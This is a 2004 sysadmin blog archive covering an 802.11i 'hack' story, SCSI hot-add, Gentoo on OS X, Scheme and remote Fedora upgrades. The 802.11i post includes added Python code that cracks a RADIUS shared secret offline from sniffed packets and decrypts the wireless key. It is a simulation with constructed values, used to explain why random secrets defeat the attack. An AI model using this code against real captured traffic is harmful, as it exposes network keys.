Archive for July, 2004

Bogus 802.11i Hack

July 31, 2004

The other day my boss forwards me a link to an eWeek article entitled “WLAN’s Exposed by Hack”.

We’ve just recently deployed a secure wireless infrastructure (using 802.1X) with the intent of upgrading to 802.11i when 802.11i supplicants start to become available. So of course I was concerned to hear there might be a “hack” for 802.11i security.

Unfortunately, the supposed “hack” was more hype than hack. The article started out promising:

A wireless LAN hardware company is set to publicize a RADIUS server security hack that can thwart the recently ratified 802.11i protocol and any WLAN infrastructure that keeps encryption keys housed in access points rather than on a central switch.

Aruba Wireless Networks Inc. will bring its findings to the Internet Engineering Task Force meeting in San Diego next week, said Aruba officials.

Aruba stands to benefit from the vulnerability report because it develops wireless hardware that keeps encryption centralized on the switch rather than on access points, but officials said the vulnerability is critical for IT managers who think the new protocol will keep their WLANs secure all by itself.

Unfortunately, things went downhill quickly from there. The first sign of trouble is this sentence: “The attack needs access to a company’s internal network”. What? The attacker already has access to your internal network? Sounds like wireless security isn’t your biggest concern….

But wait! It gets worse!

The attack needs access to a company’s internal network, to which a cracker would attach a rogue access point, perform ARP (Address Resolution Protocol) poisoning to sniff the traffic between the access point and the gateway, then send a deauthentication packet to a client. When the client reauthenticates, the access point sends a request to the RADIUS (Remote Authentication Dial-In User Service) server, which accepts the user and passes the encrypted keys to the access point. To get the RADIUS server’s shared secret, a hacker can perform an offline dictionary attack on the server, using a tool such as Cain and Abel, according to Aruba officials.

It sounds like Aruba went *way* off the deep end trying to claim that their product solves a pseudo “vulnerability” that nobody else does, and unfortunately the reporters at eWeek seem to have uncritically accepted this steaming load of FUD. This reflects rather poorly on eWeek’s reliability, as anyone spending more than a moment’s thought on Aruba’s claim will notice the following two glaring errors:

1) Despite being publicized as an “802.11i” weakness, this really has nothing to do with the 802.11i protocol. It’s a RADIUS weakness that has been known for almost as long as RADIUS has existed: the Access-Accept is authenticated only by an MD5 hash of the packet plus the shared secret, so anyone who can sniff a request/response pair can guess at the secret offline, and with the secret in hand can unwrap the key attribute the server hands to the access point. Long, random shared secrets make that guessing hopeless and have been the standard advice for many years. (Note that authentication retry limits on the RADIUS server only throttle *online* guessing; they do nothing against an attack run offline against captured traffic.)

2) If you’ve got a hostile who’s already connected to your internal network, is running a sniffer, using an offline dictionary tool against the traffic he/she has sniffed, and is using ARP poisoning to impersonate critical network devices/servers, then I don’t think you OR the attacker are going to be very concerned about your wireless infrastructure. Particularly since it’s standard practice to rotate the wireless encryption keys, so the keys the attacker sniffed will only be good for a limited time.
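What the sniffed exchange actually hands an attacker, and why the shared secret is the whole story, is easier to see in code. The following is an added example written for this page; it is not Aruba’s, eWeek’s, or Cain and Abel’s code. It simulates one Access-Accept carrying an MS-MPPE-Recv-Key attribute (the way an 802.1X/EAP RADIUS server delivers keying material to an access point, per RFC 2548 and RFC 3579), runs the offline dictionary attack against the RFC 2865 Response Authenticator, and unwraps the key with the recovered secret. The request authenticator, salt, wordlist, key bytes and the two secrets are all constructed values.

```python
import hashlib
import os
import struct

# RADIUS codes (RFC 2865) and the Microsoft VSA that carries the key (RFC 2548).
ACCESS_REQUEST = 1
ACCESS_ACCEPT = 2
VENDOR_MICROSOFT = 311
MS_MPPE_RECV_KEY = 17


def response_authenticator(code, ident, attrs, request_auth, secret):
    """RFC 2865 section 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret).
    Everything but the secret is visible on the wire."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def build_access_accept(ident, attrs, request_auth, secret):
    """The Access-Accept a server sends; request_auth is copied from the Access-Request."""
    auth = response_authenticator(ACCESS_ACCEPT, ident, attrs, request_auth, secret)
    return struct.pack("!BBH", ACCESS_ACCEPT, ident, 20 + len(attrs)) + auth + attrs


def parse_packet(raw):
    code, ident, length = struct.unpack("!BBH", raw[:4])
    return code, ident, raw[4:20], raw[20:length]


def mppe_encrypt(key, secret, request_auth, salt):
    """RFC 2548 section 2.4.2: P = len || key || zero pad to 16-byte blocks;
    b1 = MD5(S+R+A), c1 = p1^b1, bi = MD5(S+c(i-1)), ci = pi^bi."""
    plain = bytes([len(key)]) + key
    plain += b"\x00" * (-len(plain) % 16)
    out, b = b"", hashlib.md5(secret + request_auth + salt).digest()
    for i in range(0, len(plain), 16):
        c = bytes(p ^ k for p, k in zip(plain[i:i + 16], b))
        out += c
        b = hashlib.md5(secret + c).digest()
    return salt + out


def mppe_decrypt(blob, secret, request_auth):
    """Inverse of mppe_encrypt; only the secret is needed beyond what was sniffed."""
    salt, cipher = blob[:2], blob[2:]
    plain, b = b"", hashlib.md5(secret + request_auth + salt).digest()
    for i in range(0, len(cipher), 16):
        c = cipher[i:i + 16]
        plain += bytes(x ^ k for x, k in zip(c, b))
        b = hashlib.md5(secret + c).digest()
    return plain[1:1 + plain[0]]


def vsa_mppe_recv_key(blob):
    """Wrap the encrypted key in a Vendor-Specific attribute (type 26)."""
    inner = struct.pack("!BB", MS_MPPE_RECV_KEY, 2 + len(blob)) + blob
    body = struct.pack("!I", VENDOR_MICROSOFT) + inner
    return struct.pack("!BB", 26, 2 + len(body)) + body


def find_mppe_recv_key(attrs):
    i = 0
    while i < len(attrs):
        atype, alen = attrs[i], attrs[i + 1]
        if (atype == 26 and struct.unpack("!I", attrs[i + 2:i + 6])[0] == VENDOR_MICROSOFT
                and attrs[i + 6] == MS_MPPE_RECV_KEY):
            return attrs[i + 8:i + alen]
        i += alen
    return None


def crack_shared_secret(request_auth, accept_raw, wordlist):
    """Offline dictionary attack: recompute the Response Authenticator for each
    candidate and compare with the sniffed one. The server is never contacted,
    so retry limits never fire."""
    code, ident, resp_auth, attrs = parse_packet(accept_raw)
    for candidate in wordlist:
        if response_authenticator(code, ident, attrs, request_auth, candidate) == resp_auth:
            return candidate
    return None


def simulate(secret, wordlist, pmk=bytes(range(32))):
    """Build the Access-Request authenticator / Access-Accept pair an attacker on
    the wired side could sniff, then attack it. Returns (cracked secret, recovered key)."""
    request_auth = b"\xa5" * 16   # constructed; on the wire this is a fresh random value
    salt = b"\x80\x01"            # constructed; RFC 2548 requires the high bit set
    attrs = vsa_mppe_recv_key(mppe_encrypt(pmk, secret, request_auth, salt))
    accept = build_access_accept(7, attrs, request_auth, secret)
    cracked = crack_shared_secret(request_auth, accept, wordlist)
    if cracked is None:
        return None, None
    _, _, _, sniffed = parse_packet(accept)
    return cracked, mppe_decrypt(find_mppe_recv_key(sniffed), cracked, request_auth)


WORDLIST = [b"radius", b"testing123", b"password1", b"secret"]   # constructed

if __name__ == "__main__":
    print(simulate(b"testing123", WORDLIST))                   # weak secret: key exposed
    print(simulate(os.urandom(24).hex().encode(), WORDLIST))  # strong secret: (None, None)
```

A real capture needs both the Access-Request (for its 16-byte authenticator) and the Access-Accept, which is exactly the wired AP-to-server traffic the article describes. The weak secret falls to a four-word list; the random one returns (None, None), which is the whole of Aruba’s “vulnerability” and the whole of its mitigation.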

This isn’t really a vulnerability. This is negative vendor hype at its worst. Aruba should be ashamed of themselves for stooping to such blatant fear mongering. And eWeek should be ashamed for blindly and unquestioningly accepting Aruba’s dubious information.

How to activate and de-activate a scsi drive under Linux

July 22, 2004

I came across these commands because I wanted to add a new drive (not replace, add) to a Linux system that has hot-swap SCSI drives. When I put the new drive in, the OS couldn’t see it. I finally found the command below to “activate” the drive so that you can use it.

Activate the drive:

echo "scsi add-single-device <host> <channel> <id> <lun>" > /proc/scsi/scsi

for example:

echo "scsi add-single-device 0 00 01 00" > /proc/scsi/scsi

Deactivate the drive:

echo "scsi remove-single-device <host> <channel> <id> <lun>" > /proc/scsi/scsi

for example:

echo "scsi remove-single-device 0 0 1 0" > /proc/scsi/scsi

See what drives are active:

cat /proc/scsi/scsi

for example:

[root@hostname root]# cat /proc/scsi/scsi
Attached devices:
Host: scsi0 Channel: 00 Id: 00 Lun: 00
  Vendor: COMPAQ   Model: MAB3091SC        Rev: 0814
  Type:   Direct-Access                    ANSI SCSI revision: 02
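
Echoing four numbers into /proc/scsi/scsi is unforgiving: a typo adds a phantom device or tells the mid-layer to forget a disk that is in use. The following added example (written for this page, not part of the original post) parses the “Attached devices” listing above and only issues add-single-device or remove-single-device when the kernel’s current state calls for it. The `path` parameter is an assumption added so the same code can be pointed at a saved copy of the file; the SAMPLE listing is constructed from the format shown in the post.

```python
import re
import sys

# Where the 2.4/2.6 SCSI mid-layer exposes its attach/detach interface.
PROC_SCSI = "/proc/scsi/scsi"

# Constructed sample in the exact layout the post shows.
SAMPLE = """Attached devices:
Host: scsi0 Channel: 00 Id: 00 Lun: 00
  Vendor: COMPAQ   Model: MAB3091SC        Rev: 0814
  Type:   Direct-Access                    ANSI SCSI revision: 02
"""

_HOST_RE = re.compile(r"^Host: scsi(\d+) Channel: (\d+) Id: (\d+) Lun: (\d+)")
_VENDOR_RE = re.compile(r"Vendor:\s*(.*?)\s+Model:\s*(.*?)\s+Rev:\s*(\S+)")


def parse_proc_scsi(text):
    """Map (host, channel, id, lun) -> {vendor, model, rev, type} for each
    device the kernel currently lists. Numbers are zero-padded in the file,
    so they are compared as integers."""
    devices, current = {}, None
    for raw in text.splitlines():
        m = _HOST_RE.match(raw)
        if m:
            current = tuple(int(x) for x in m.groups())
            devices[current] = {}
            continue
        if current is None:
            continue
        line = raw.strip()
        v = _VENDOR_RE.match(line)
        if v:
            devices[current].update(vendor=v.group(1), model=v.group(2), rev=v.group(3))
        elif line.startswith("Type:"):
            devices[current]["type"] = line.split()[1]
    return devices


def scsi_command(action, host, channel, target, lun):
    """Build the exact line the post echoes into /proc/scsi/scsi."""
    if action not in ("add", "remove"):
        raise ValueError("action must be 'add' or 'remove'")
    for n in (host, channel, target, lun):
        if not isinstance(n, int) or n < 0:
            raise ValueError("host/channel/id/lun must be non-negative integers")
    return f"scsi {action}-single-device {host} {channel} {target} {lun}"


def _attached(path):
    with open(path) as f:
        return parse_proc_scsi(f.read())


def add_device(addr, path=PROC_SCSI):
    """Hot-add a drive; refuse if that address is already listed, which is the
    usual sign of a typo in the id/lun rather than a genuinely new disk."""
    attached = _attached(path)
    if addr in attached:
        raise RuntimeError(f"{addr} already attached: {attached[addr]}")
    cmd = scsi_command("add", *addr)
    with open(path, "w") as f:
        f.write(cmd + "\n")
    return cmd


def remove_device(addr, path=PROC_SCSI):
    """Hot-remove a drive; refuse if it is not listed. Unmount it and stop all
    I/O to it first: this only tells the mid-layer to forget the device."""
    if addr not in _attached(path):
        raise RuntimeError(f"{addr} is not attached")
    cmd = scsi_command("remove", *addr)
    with open(path, "w") as f:
        f.write(cmd + "\n")
    return cmd


if __name__ == "__main__":
    # usage: scsi_hotplug.py list | add HOST CHANNEL ID LUN | remove HOST CHANNEL ID LUN
    if len(sys.argv) == 2 and sys.argv[1] == "list":
        for addr, info in _attached(PROC_SCSI).items():
            print(addr, info)
    elif len(sys.argv) == 6 and sys.argv[1] in ("add", "remove"):
        addr = tuple(int(x) for x in sys.argv[2:])
        print({"add": add_device, "remove": remove_device}[sys.argv[1]](addr))
    else:
        print(parse_proc_scsi(SAMPLE))
```

Run as root on the target box; `list` shows what the kernel has, and `add`/`remove` refuse to act when the listing contradicts the request.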

Gentoo MacOS Considered Harmful

July 20, 2004

I read with some interest this post on Slashdot regarding Gentoo MacOS. Apparently the fine folks at Gentoo have ported their package tool (Portage) to run under Mac OSX. You can then use Portage to compile and install a wide variety of Unix programs on OSX.

Great! I thought. Fink does something very similar, but uses Debian based tools. I’m a total Unix geek, so I use Fink a *lot* to install some of my favorite Unix Free Software onto my OSX Powerbook. Competition is always good, so I was initially looking forward to trying Gentoo MacOS.

Until, that is, I read this little gem on their webpage:

“Gentoo MacOS is very new and very Alpha. Portage installs things in / and could possibly overwrite important packages that were installed by OS X. Use this technology at your own risk!”

WTF? I’m hoping this is just an Alpha version problem and they’re planning to fix it. Because allowing a third party program to overwrite OSX installed system binaries is mind numbingly stupid.

Gentoo MacOS should work like Fink, and install all of its software to a separate subdirectory and leave the original OS files *alone*. Overwriting the vendor supplied binaries is just inviting disaster.

Until they get this fixed, I certainly won’t be installing Gentoo MacOS on *my* Mac. And I recommend that everyone else avoid it also.

Three Hello Worlds

July 20, 2004

The classic first program in any language is, of course, the “Hello World” program. Here then, are three different versions of “Hello World” written in PLT Scheme.

Console based (from Teach Yourself Scheme in Fixnum Days):

(begin
  (display "Hello, World!")
  (newline))

Web based (example program that comes with PLT Scheme servlet library):

(require (lib "unitsig.ss")
         (lib "servlet-sig.ss" "web-server"))

(unit/sig () (import servlet^)

  (define the-text "Hello, Web!")

  `(html (head (title ,the-text))
         (body ([bgcolor "white"])
               (p ,the-text))))

And finally, GUI Based (written by me):

(define greeting "Hello world!")
(define frame (instantiate frame% (greeting)))
(define msg (instantiate message% (greeting frame)))
(send frame show #t)

I still don’t know what the hell I’m doing, but it’s a start right?

Remote Upgrading Redhat Servers

July 14, 2004

I’ve figured out a decent way to remotely upgrade Redhat/Fedora systems without requiring anyone to physically touch the remote system (i.e., no boot disk, etc.). I came up with this procedure to upgrade some DNS servers at work. They’re in several different cities, and any on-site support staff are usually busy with their own work, and seldom have any Linux knowledge.

I’ve tested this procedure upgrading several different versions of Redhat to Fedora Core2:

1) Mirror all of the files from the Fedora CD (or the appropriate directory of the Fedora FTP site) to a local file server. Share those files via anonymous FTP.

2) The files used to boot the version of linux for the installer are in the directory /isolinux of the install tree. Copy the kernel file (vmlinuz) and the initial ramdisk (initrd.img) to the /boot directory of the target machine (the one you’ll be trying to upgrade).

3) Create a kickstart file to automate the upgrade. The kickstart file is necessary to tell the install program (anaconda) where to find the RPMs, whether to use DHCP, etc. Copy the kickstart file to the /boot directory of the target machine.
A sample kickstart file can be found here.

4) Edit the /etc/grub.conf file on the target machine to tell it to boot from the kernel and initial ramdisk that we copied from the install media. The lines to append to grub.conf will look something like this:

title Upgrade
root (hd0,0)
kernel /boot/upgrade-vmlinuz ks=hd:hda1:/boot/ks.cfg vnc vncconnect=<host> ramdisk_size=8192
initrd /boot/upgrade-initrd.img

In the above example, I copied the vmlinuz file to /boot/upgrade-vmlinuz and the initrd.img to /boot/upgrade-initrd.img. I’m also passing some command line arguments to the kernel that will be passed on to the install program. The first of these, “ks=hd:hda1:/boot/ks.cfg”, tells the installer to load our kickstart file from /boot/ks.cfg on hard drive partition hda1. The arguments “vnc vncconnect=<host>” tell the installer to use VNC to connect back to my workstation (<host>) to display the progress of the installation. This part isn’t strictly necessary, but I find it handy to be able to watch the progress of the install. It’ll also allow you to see a lot of possible errors (like not enough disk space). The ramdisk_size argument may or may not be necessary. I read some newsgroup postings that recommended it.

5) Tell grub to use the “Upgrade” config we just created at the next reboot. The grub boot configurations are numbered from the top of the config to the bottom, starting at 0. So if our config is the second one in the file, it would be config #1. Enter the grub command line by typing “grub”. Then at the grub prompt type “savedefault --default=1 --once”, substituting the appropriate grub config number for 1. This tells grub to boot our new config, config #1, as the default on the next reboot, but *to return to the old default for every reboot after that*! This is important, because it means that if the installer has problems (maybe our kickstart is fubarred?) we can reboot back to our original config.

On older versions of Redhat you may get an error message from grub when you type the above command. The “--once” option to savedefault seems to be a patch that Redhat has applied to grub in their more recent distributions. If you’re using an older distribution, you may need to compile and install a more recent grub. I’ve recompiled the latest Fedora grub to work on Redhat 7.2; it may work on other versions. If you want to try it, you can download it here. Install it with “rpm -U grub-0.94-5.i386.rpm”, then run “grub-install <device>”, i.e. “grub-install hda”.

6) Start the vncviewer on your workstation: “vncviewer --listen”.

7) Reboot the server. Wait nervously for it to connect to your VNC viewer.
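The step most likely to go wrong in the above is the entry number handed to savedefault, since GRUB counts “title” lines from 0 in file order and an off-by-one boots the wrong kernel on a box nobody can walk up to. The following added example (written for this page, not the post’s own script) appends the Upgrade stanza to a grub.conf, reports the entry number and the one-shot grub command, and lists any kernel/initrd paths that do not exist yet. SAMPLE_GRUB_CONF is a constructed one-entry file; the `vnc_host` default is a placeholder for the workstation running the listening viewer. One caveat the post does not mention: VNC carries the installer screen in the clear, so keep the path between server and workstation on a network you trust, or tunnel it.

```python
import os
import re

# Constructed sample of a one-entry /etc/grub.conf, in the layout the post edits.
SAMPLE_GRUB_CONF = """default=0
timeout=10
title Red Hat Linux
\troot (hd0,0)
\tkernel /boot/vmlinuz ro root=/dev/hda1
\tinitrd /boot/initrd.img
"""


def upgrade_stanza(root="(hd0,0)", kernel="/boot/upgrade-vmlinuz",
                   initrd="/boot/upgrade-initrd.img", ks="hd:hda1:/boot/ks.cfg",
                   vnc_host="192.0.2.10", ramdisk_size=8192):
    """The stanza from the post. vnc_host is a placeholder for the workstation
    running 'vncviewer --listen'; anaconda accepts host or host:port."""
    return ("title Upgrade\n"
            f"root {root}\n"
            f"kernel {kernel} ks={ks} vnc vncconnect={vnc_host} ramdisk_size={ramdisk_size}\n"
            f"initrd {initrd}\n")


def title_indices(conf):
    """GRUB numbers 'title' entries from 0 in file order; that number is what
    'savedefault --default=N --once' takes."""
    return {m.group(1).strip(): i
            for i, m in enumerate(re.finditer(r"^[ \t]*title[ \t]+(.*)$", conf, re.M))}


def add_upgrade_entry(conf, **stanza_args):
    """Return (new grub.conf text, entry number, one-shot grub command)."""
    if "Upgrade" in title_indices(conf):
        raise ValueError("grub.conf already contains an Upgrade entry")
    new_conf = conf.rstrip("\n") + "\n\n" + upgrade_stanza(**stanza_args)
    idx = title_indices(new_conf)["Upgrade"]
    return new_conf, idx, f"savedefault --default={idx} --once"


def missing_boot_files(stanza):
    """Kernel/initrd paths named in the stanza that do not exist on this host.
    The paths are as GRUB sees them from 'root': if /boot is its own partition
    they must be written without the /boot prefix."""
    wanted = re.findall(r"^[ \t]*(?:kernel|initrd)[ \t]+(\S+)", stanza, re.M)
    return [p for p in wanted if not os.path.exists(p)]


if __name__ == "__main__":
    conf, idx, cmd = add_upgrade_entry(SAMPLE_GRUB_CONF)
    print(conf)
    print("entry number:", idx, "-> at the grub prompt run:", cmd)
    print("not yet in place:", missing_boot_files(upgrade_stanza()))
```

Run it on the target after step 2 and it tells you which files are still missing before you touch grub.conf; the returned entry number is the one to feed to savedefault in step 5.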

More resources for learning Scheme

July 12, 2004

Found a few more online resources for learning Scheme. They are:

LVM and upgrading to Fedora Core 2

July 7, 2004

If you’re running the Linux LVM (Logical Volume Manager) and planning to upgrade to Fedora Core 2, I found a couple of caveats to watch out for.

First, LVM allows you to make physical volumes out of hard drive partitions or out of a whole hard drive. Make sure your physical volumes are all partitions. I tried upgrading a machine this morning that had a whole disk as one of its physical volumes. The Fedora Core 2 install program, Anaconda, complained that it couldn’t read the partition table on the drive.

Second, in your /etc/fstab file, specify any logical volumes by full path name (i.e. /dev/vg1/var) and not by label (i.e. LABEL=/var). Otherwise Anaconda can’t seem to find the volume to mount it. Note that volume labels work fine for normal partitions, just not for LVM volumes.

Trying to learn Scheme

July 7, 2004

I’ve started trying to learn Scheme, so I’ve installed the DrScheme environment on my PowerBook and I’ve also read through Teach Yourself Scheme in Fixnum Days.

While I was reading Teach Yourself Scheme, it seemed like a very good book, very clear and concise. But then I started trying to learn how to use the Continuations-based Servlet library that PLT Scheme has for writing web based applications and I found out that I’ve still got a ways to go to really understanding Scheme.

I’ve managed to modify some of the example servlets that come with PLT Scheme, but I still don’t feel comfortable enough to start developing something of my own. I think I know enough to be able to *read* basic Scheme programs, but not enough to know how to go about writing my own programs in Scheme.

I’m trying now to decide whether to read How To Design Programs or Structure and Interpretation of Computer Programs. HTDP looks *so* basic it might be hard not to get bored. On the other hand SICP looks quite hard. Any suggestions?

Fedora Core 2 problems

July 6, 2004

I upgraded a couple of servers at work to Fedora Core 2 last week. On the first server, the upgrade worked great, no problems. On the second server, a Compaq DL380, I ran into a weird problem. After the upgrade, the server would lock up after any network activity larger than pings.

So I could ping the server all day, for example, but as soon as I tried to SSH to it, it’d lock up.

After much experimenting the solution, or workaround at least, was to boot to a non-SMP kernel. The DL380 is dual processor capable, but this particular one only has one processor installed.

That’s an adequate workaround for now. Hopefully I won’t need to upgrade that box to a second processor anytime soon!

Open Source Paradigm Shift

July 1, 2004

Last night I read Tim O’Reilly’s new article “The Open Source Paradigm Shift”. There’s a lot of good stuff in there, and I would definitely recommend it to anyone with an interest in Open Source or even just with an interest in where the IT industry is going.

The article has one of the best explanations I’ve seen of how Open Source software doesn’t reduce value, it helps to create value for the industry as a whole. Open Source software may be accelerating the commoditization of the software industry, but that commoditization was inevitable with or without Open Source.

There’s also some interesting stuff in there about network effects, and how the Open Source development process, Ebay, and Amazon all successfully leverage network effects in similar, but different ways.

For all that I like about the article, there is one point where I hope that O’Reilly is wrong. He says:

The values of the free and open source community are an important part of its paradigm. Just as the Copernican revolution was part of a broader social revolution that turned society away from hierarchy and received knowledge, and instead sparked a spirit of inquiry and knowledge sharing, open source is part of a communications revolution designed to maximize the free sharing of ideas expressed in code.

…..

The lessons of previous paradigm shifts show us a more subtle and powerful story than one that merely pits a gift culture against a monetary culture, and a community of sharers versus those who choose not to participate. Instead, we see a dynamic migration of value, in which things that were once kept for private advantage are now shared freely, and things that were once thought incidental become the locus of enormous value.

To me, the revival of the gift culture is *the* most important part of the Free Software Movement. I hope that the “broader social revolution” that Free Software is part of isn’t just about “a communications revolution”. I hope that it’s about a rediscovery of the values of community, of working together toward a common goal. I hope that it’s about realizing that not everything in life needs to be about money and not everything in life needs to be directed by our employer, the government, or a “corporate sponsor”. We’re more than just “consumers”, or “eyeballs”, or even citizens. We’re people. And people can and should work together, help one another, and sometimes even build something wonderful.